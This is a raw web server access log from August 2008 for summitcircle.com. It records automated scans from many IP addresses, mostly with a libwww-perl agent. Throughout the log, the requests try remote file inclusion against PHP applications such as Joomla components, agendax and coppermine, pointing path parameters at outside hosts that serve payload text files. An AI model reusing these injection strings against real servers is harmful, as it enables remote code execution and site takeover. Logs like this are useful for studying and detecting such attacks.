216.249.32.13 - - [10/Aug/2008:18:31:31 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.249.32.13 - - [10/Aug/2008:18:31:31 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
219.117.239.114 - - [10/Aug/2008:18:31:33 -0700] "GET /logs/access_080406.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.249.32.13 - - [10/Aug/2008:18:31:33 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.249.32.13 - - [10/Aug/2008:18:31:33 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:18:31:45 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:18:32:18 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:18:32:19 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:18:34:42 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:18:34:43 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.summitcircle.com"
84.21.71.133 - - [10/Aug/2008:18:35:09 -0700] "GET /logs/access_070917.log/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
84.21.71.133 - - [10/Aug/2008:18:35:09 -0700] "GET /logs/access_080406.log/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
84.21.71.133 - - [10/Aug/2008:18:35:11 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
84.21.71.133 - - [10/Aug/2008:18:35:11 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.117.239.114 - - [10/Aug/2008:18:35:34 -0700] "GET /logs/access_071021.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
219.117.239.114 - - [10/Aug/2008:18:35:40 -0700] "GET /logs/access_080406.log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
219.117.239.114 - - [10/Aug/2008:18:35:40 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.summitcircle.com"
219.117.239.114 - - [10/Aug/2008:18:35:42 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5943 "-" "libwww-perl/5.65" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:18:36:35 -0700] "GET /logs/access_080107.log/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:38:13 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:40:56 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:41:17 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.136 - - [10/Aug/2008:18:41:55 -0700] "GET /logs/access_071217.log//convert/mvcw.php?step=1&vwar_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.136 - - [10/Aug/2008:18:41:55 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.136 - - [10/Aug/2008:18:41:56 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.136 - - [10/Aug/2008:18:42:06 -0700] "GET /logs/access_080210.log//convert/mvcw.php?step=1&vwar_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:43:37 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:43:38 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:44:02 -0700] "GET /logs/access.log/?sourcedir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:44:02 -0700] "GET /?sourcedir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:44:02 -0700] "GET /logs/?sourcedir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5943 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:44:04 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:44:04 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:45:48 -0700] "GET /logs/access_071217.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:45:48 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:45:48 -0700] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:18:45:55 -0700] "GET /logs/access_080406.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:18:45:56 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:46:02 -0700] "GET /logs/access_080310.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:46:02 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:46:02 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.226.25 - - [10/Aug/2008:18:46:10 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
210.245.226.25 - - [10/Aug/2008:18:46:28 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.46.85 - - [10/Aug/2008:18:46:52 -0700] "GET /logs/access_080421.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
216.246.46.85 - - [10/Aug/2008:18:46:52 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
216.246.46.85 - - [10/Aug/2008:18:46:52 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
89.111.179.10 - - [10/Aug/2008:18:47:31 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.179.10 - - [10/Aug/2008:18:47:31 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.253.223.90 - - [10/Aug/2008:18:47:42 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.253.223.90 - - [10/Aug/2008:18:47:42 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
88.191.59.190 - - [10/Aug/2008:18:48:03 -0700] "GET /logs/access_071015.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.246.46.85 - - [10/Aug/2008:18:48:04 -0700] "GET /logs/access_080602.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
88.191.59.190 - - [10/Aug/2008:18:48:04 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.191.59.190 - - [10/Aug/2008:18:48:04 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.224.152.230 - - [10/Aug/2008:18:48:27 -0700] "GET /logs/access_080421.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.224.152.230 - - [10/Aug/2008:18:48:27 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.224.152.230 - - [10/Aug/2008:18:48:27 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:48:48 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.25.170.18 - - [10/Aug/2008:18:48:48 -0700] "GET /logs/access_071112.log/index.php?sourcedir=http://127.0.0.1/www.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.25.170.18 - - [10/Aug/2008:18:48:49 -0700] "GET /index.php?sourcedir=http://127.0.0.1/www.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.25.170.18 - - [10/Aug/2008:18:48:49 -0700] "GET /logs/index.php?sourcedir=http://127.0.0.1/www.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.111.176.90 - - [10/Aug/2008:18:48:50 -0700] "GET /logs/access_071015.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.90 - - [10/Aug/2008:18:48:50 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.90 - - [10/Aug/2008:18:48:51 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [10/Aug/2008:18:48:51 -0700] "GET /logs/access_071015.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [10/Aug/2008:18:48:52 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [10/Aug/2008:18:48:52 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:48:55 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.25.170.18 - - [10/Aug/2008:18:48:56 -0700] "GET /logs/access_080128.log/index.php?sourcedir=http://127.0.0.1/www.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.46.85 - - [10/Aug/2008:18:48:57 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:48:59 -0700] "GET /logs/access_080114.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:48:59 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
88.191.59.190 - - [10/Aug/2008:18:49:01 -0700] "GET /logs/scripts.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.179.10 - - [10/Aug/2008:18:49:20 -0700] "GET /logs/access_071015.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:49:20 -0700] "GET /logs/access_071111.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.179.10 - - [10/Aug/2008:18:49:20 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:49:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.179.10 - - [10/Aug/2008:18:49:21 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.25.170.18 - - [10/Aug/2008:18:49:33 -0700] "GET /logs/index.php?sourcedir=http://127.0.0.1/www.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.25.170.18 - - [10/Aug/2008:18:49:34 -0700] "GET /index.php?sourcedir=http://127.0.0.1/www.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:49:37 -0700] "GET /logs/access_080406.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.121.133.130 - - [10/Aug/2008:18:49:40 -0700] "GET /logs/access_071015.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.121.133.130 - - [10/Aug/2008:18:49:40 -0700] "GET /logs/access_071015.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
203.121.133.130 - - [10/Aug/2008:18:49:40 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.121.133.130 - - [10/Aug/2008:18:49:40 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
203.121.133.131 - - [10/Aug/2008:18:49:41 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.224.152.230 - - [10/Aug/2008:18:49:48 -0700] "GET /logs/access_080602.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:49:49 -0700] "GET /logs/access_080204.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:49:49 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
89.111.176.106 - - [10/Aug/2008:18:50:04 -0700] "GET /logs/scripts.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.90 - - [10/Aug/2008:18:50:06 -0700] "GET /logs/scripts.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:50:14 -0700] "GET /logs/access_071112.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
219.117.239.114 - - [10/Aug/2008:18:50:18 -0700] "GET /logs/access_080511.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
219.117.239.114 - - [10/Aug/2008:18:50:21 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
219.117.239.114 - - [10/Aug/2008:18:50:24 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
66.224.152.230 - - [10/Aug/2008:18:50:30 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:50:30 -0700] "GET /logs/access_080406.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:50:30 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.179.10 - - [10/Aug/2008:18:50:31 -0700] "GET /logs/scripts.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:50:41 -0700] "GET /logs/access_080210.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:50:41 -0700] "GET /logs/access_080303.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.121.133.131 - - [10/Aug/2008:18:50:45 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.121.133.133 - - [10/Aug/2008:18:51:17 -0700] "GET /logs/scripts.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
203.121.133.133 - - [10/Aug/2008:18:51:23 -0700] "GET /logs/scripts.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.226.25 - - [10/Aug/2008:18:52:15 -0700] "GET /logs/access_080310.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
210.245.226.25 - - [10/Aug/2008:18:52:15 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
210.245.226.25 - - [10/Aug/2008:18:52:16 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
